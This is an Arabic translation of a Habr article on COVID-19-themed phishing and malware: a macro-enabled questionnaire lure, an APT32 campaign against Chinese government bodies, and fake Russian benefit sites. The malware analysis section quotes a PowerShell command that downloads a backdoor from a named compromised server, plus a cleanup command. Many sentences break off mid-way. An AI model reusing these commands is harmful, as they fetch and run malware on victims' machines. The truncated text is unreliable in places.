يواصل المهاجمون استغلال موضوع فيروس كورونا (COVID-19)، مما يخلق المزيد والمزيد من التهديدات للمستخدمين المهتمين بشدة بكل ما يتعلق بالوباء. في
تذكر في
هل ترغب في إجراء اختبار مجاني لـCOVID-19؟
مثال مهم آخر على التصيد الاحتيالي تحت عنوان فيروس كورونا هو
كان من السهل أيضًا إقناع معظم المستخدمين بتمكين وحدات الماكرو. للقيام بذلك، تم استخدام خدعة قياسية: لملء الاستبيان، تحتاج أولا إلى تمكين وحدات الماكرو، مما يعني أنك بحاجة إلى تشغيل البرنامج النصي VBA.
كما ترون، فإن البرنامج النصي VBA مقنع بشكل خاص من برامج مكافحة الفيروسات.
يحتوي Windows على ميزة الانتظار حيث ينتظر التطبيق /T <ثانية> قبل قبول الإجابة الافتراضية "نعم". في حالتنا، انتظر البرنامج النصي 65 ثانية قبل حذف الملفات المؤقتة:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
وأثناء الانتظار، تم تنزيل البرامج الضارة. تم إطلاق برنامج PowerShell النصي الخاص لهذا الغرض:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
بعد فك تشفير قيمة Base64، يقوم البرنامج النصي PowerShell بتنزيل الباب الخلفي الموجود على خادم الويب الذي تم اختراقه مسبقًا من ألمانيا:
http://automatischer-staubsauger.com/feature/777777.png
ويحفظه تحت الاسم :
C:UsersPublictmpdirfile1.exe
ملف ‘C:UsersPublictmpdir’
يتم حذفه عند تشغيل الملف "tmps1.bat" الذي يحتوي على الأمر cmd /c mkdir ""C:UsersPublictmpdir"".
هجوم مستهدف على الجهات الحكومية
بالإضافة إلى ذلك، أبلغ محللو FireEye مؤخرًا عن هجوم مستهدف APT32 استهدف الهياكل الحكومية في ووهان، وكذلك وزارة إدارة الطوارئ الصينية. احتوت إحدى ملفات RTF الموزعة على رابط لمقال نشرته صحيفة نيويورك تايمز بعنوان
ومن المثير للاهتمام أنه في وقت الاكتشاف، لم تكتشف أي من برامج مكافحة الفيروسات هذه الحالة، وفقًا لموقع Virustotal.
عندما تكون المواقع الرسمية معطلة
المثال الأكثر وضوحا لهجوم التصيد حدث في روسيا قبل بضعة أيام. وكان السبب في ذلك هو تعيين الاستحقاق الذي طال انتظاره للأطفال الذين تتراوح أعمارهم بين 3 إلى 16 سنة. عندما تم الإعلان عن بدء قبول الطلبات في 12 مايو 2020، هرع الملايين إلى موقع خدمات الدولة للحصول على المساعدة التي طال انتظارها وأسقطوا البوابة ليس أسوأ من هجوم DDoS الاحترافي. وعندما قال الرئيس إن "الخدمات الحكومية لا تستطيع التعامل مع تدفق الطلبات"، بدأ الناس يتحدثون عبر الإنترنت عن إطلاق موقع بديل لقبول الطلبات.
المشكلة هي أن العديد من المواقع بدأت العمل في وقت واحد، وبينما يقبل موقع واحد، وهو الموقع الحقيقي posobie16.gosuslugi.ru، الطلبات فعليًا، المزيد
اكتشف زملاؤه من SearchInform حوالي 30 نطاقًا احتياليًا جديدًا في منطقة .ru. وتتبعت شركة Infosecurity وSoftline أكثر من 70 موقعًا إلكترونيًا خدميًا حكوميًا مزيفًا مماثلًا منذ بداية أبريل. يتلاعب منشئوها بالرموز المألوفة ويستخدمون أيضًا مجموعات من الكلمات gosuslugi وgosuslugi-16 وvyplaty وcovid-vyplaty وposobie وما إلى ذلك.
الضجيج والهندسة الاجتماعية
كل هذه الأمثلة تؤكد فقط أن المهاجمين ينجحون في تحقيق الدخل من موضوع فيروس كورونا. وكلما زاد التوتر الاجتماعي والقضايا غير الواضحة، زادت فرص المحتالين في سرقة البيانات المهمة، أو إجبار الأشخاص على التخلي عن أموالهم بأنفسهم، أو ببساطة اختراق المزيد من أجهزة الكمبيوتر.
وبالنظر إلى أن الوباء قد أجبر الأشخاص غير المستعدين على العمل من المنزل بشكل جماعي، فإن البيانات الشخصية، ولكن أيضًا بيانات الشركات، معرضة للخطر. على سبيل المثال، تعرض مستخدمو Microsoft 365 (Office 365 سابقًا) مؤخرًا لهجوم تصيد احتيالي. تلقى الأشخاص رسائل صوتية "ضائعة" ضخمة كمرفقات بالرسائل. ومع ذلك، كانت الملفات في الواقع عبارة عن صفحة HTML تم إرسال ضحايا الهجوم إليها
المصدر: www.habr.com